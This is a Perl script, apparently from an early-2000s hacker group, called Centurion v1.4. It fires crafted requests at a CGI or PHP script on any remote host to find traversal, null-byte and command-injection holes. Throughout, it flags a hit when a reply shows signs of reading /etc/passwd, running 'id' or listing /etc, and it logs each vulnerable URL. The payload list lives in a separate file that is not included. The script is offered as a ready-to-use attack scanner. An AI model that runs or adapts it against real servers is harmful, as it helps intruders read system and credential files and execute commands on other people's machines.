#!/usr/bin/perl
# Centurion v1.4
# by |ntruder
# Limpid Byte http://lbyte.void.ru
# lbyte@host.sk IRC:Efnet #limpidbyte
#
# Centurion checks any cgi script on remote server for vulnerabilities like traversal bug, null
# byte etc... Basic idea is to check for incorrect filtering of information sent to script.
# Tested on CGI, PL, PHP, SHTML . My guess is, that it will work with any other scripts >).
# Notes: 
# - At the moment it works only with UNIX alike systems (doesn't find anything on win32 based servers)
# - Doesnt work with scripts which generate FRAMES for output results.
# Some Help:
# If you start Centurion with -p or -f parameters you must specify file with parameters.
# For example parameters file should look like this: 
# temp|pagename|show 
# ... and so on. Parameters must be separated from each other with "|" sign.
# If you want to check a script with existing parameters containing data, like 
# script.cgi?id=476&session=23&show you should specify it like: 
# id=476&session=23&show
# - where 'show' is parameter to check.
# Hence, the last parameter shouldnt contain "=" at the end.
# All bug reports send to lbyte@host.sk
#

####################### SOME SETTINGS #############################################
# specify a log file:
$log="centurion.log";

# specify a port:
$port="80";

# How long to sleep if can't connect (in seconds):
$sleep="5";

# Maximum number of attempts to connect if can't connect:
$conlimit="4";

# What to look for in the recived results. Leave it as it is, if you don't change  
# requests to files, directorys and commands to execute. :

%match = (
	'root:', "*",       #in passwd file, right after root ;)
	'uid=', "|",        #executing 'id'
	'hosts.allow', "/"  #list /etc/ directory
);
####################### DON't CHANGE ANYTHING BELOW ###############################

use IO::Socket;
unless (@ARGV > 2) { &use; exit;}
($opt,$adr,$path) = @ARGV[0..2];
$par="";
$connect= $dot = "0";


open (BASE, "<base") || die "Can't open BASE with requests\n";
chomp(@request=<BASE>);
close BASE;

if ($opt eq "-s"){ 
		&pstat; 
		print "\nSingle mode check\n"."-"x 29 ."\n";
		&smode;&f; 
		}
elsif ($opt eq "-p"){ 
	if ($ARGV[3]){ 
		&pstat; &param;&f; 
		} 
	else { 
		print "in -p mode you must specify parameters file\n"; 
		exit;
		}
	}
elsif ($opt eq "-f"){ 
	if ($ARGV[3]){ 
		&pstat; 
		print "\n[Step 1]\nSingle mode check\n"."-"x 29 ."\n";
		&smode; 
		print "\n[Step 2]"; 
		&param;&f; 
		} 
	else { 
		print "in -f mode you must specify parameters file\n"; 
		exit;
		}
	}
else { &use; }

sub param {
open (PAR, "<$ARGV[3]") || die "\nCan't open parameters file\n";
@params=split (/\|/, <PAR>);
chomp(@params);
close PAR;
print "\nCheck with parameters:\n"."-"x 29;
foreach $par1 (@params) {
	print "\n=> trying $path?$par1\n";
	$par = "$par1"."=";
	&smode;
	}
}

sub smode {
foreach $req (@request) {
	&mksock;
	print $sock "GET $path"."?"."$par"."$req HTTP/1.0\nHost: $adr\n\n";
		@data=<$sock>;
		chomp(@data);
		foreach $dat (@data) {
			$i=0;
			foreach $m (keys %match) {
				if ($dat =~ m/$m/i) {
					print "$match{$m}"; 
					&logger; 
					$i="1";
					}
				else {next;}
			   }
			 if ($i){last;} else {next;}
			}
		 close ($sock);
	}
}

sub pstat {
	if (-e $log)  { &ver; } else {
		open (LOGS, ">$log") || die "Can't Create LOGS file\n";
		print LOGS "Centurion v 1.4 Log File:\n"."="x 20;
		close LOGS;
		&ver;
		}
	print "Connecting to $adr:";
	&mksock;
	print " connected\n";
	close ($sock);
	print "Accessing $path:";
	&mksock;
	print $sock "GET $path HTTP/1.0\nHost: $adr\n\n";
	@serv=<$sock>;
	if ($serv[0] =~ /200/) { 
		print " Exist\n";
	} elsif ($serv[0] =~ /302/) { 
		print "\nRedirection. Can't Continue\n"; 
		exit;
	} elsif ($serv[0] =~ /404/) { 
		print "Script not found\n"; 
		exit;
	} else {
		print "Unknown replay from server\n";
		}
	close ($sock);
	$connect= $dot = "1";
	open (LOGS, ">>$log") || die "Can't Open LOGS file\n";
	print LOGS "\nResults for $adr\n";
	close LOGS;
}

sub mksock {
	$sock = IO::Socket::INET->new(
	Proto => "tcp",
	PeerAddr => $adr,
	PeerPort => $port
	);
	if ((!$sock) && ($connect)) { 
		if ($att eq $conlimit) { 
			 print "Could't connect to $adr\n"; 
			exit; 
		} else {
			 print "\ncan't connect to $adr\n";
			 print "Sleeping for $sleep seconds ...\n";
			select (undef, undef, undef, $sleep);
			 print "Continuing\n";
			$att++;
			&mksock;
		}
	} elsif (!$sock) { 
		print "could't connect\n";
		exit;
	} else { 
		 print "." if ($dot);	
	}
}	

sub logger {
	open (LOGS, ">>$log") || die "Can't open LOGS\n";
	print LOGS "$adr$path?$par$req\n";
	close LOGS;
}

sub use {
	print "USAGE:\n";
	print "centurion.pl -s www.host.com /path/to/script.cgi\n";
	print "centurion.pl -p www.host.com /path/to/script.cgi params.file\n";
	print "centurion.pl -f www.host.com /path/to/script.cgi params.file\n\n";
	print "-s = [Single mode - no parameters]\n";
	print "-p = [Check with parameters only]\n";
	print "-f = [Full check]\n";
}

sub ver {
	print "=============================\n";
	print "Centurion v1.4 by |ntruder\n";
	print "Limpid Byte - lbyte.void.ru\n";
	print "=============================\n";
}

sub f {
	print "\n\n---FINISHED---\n";
}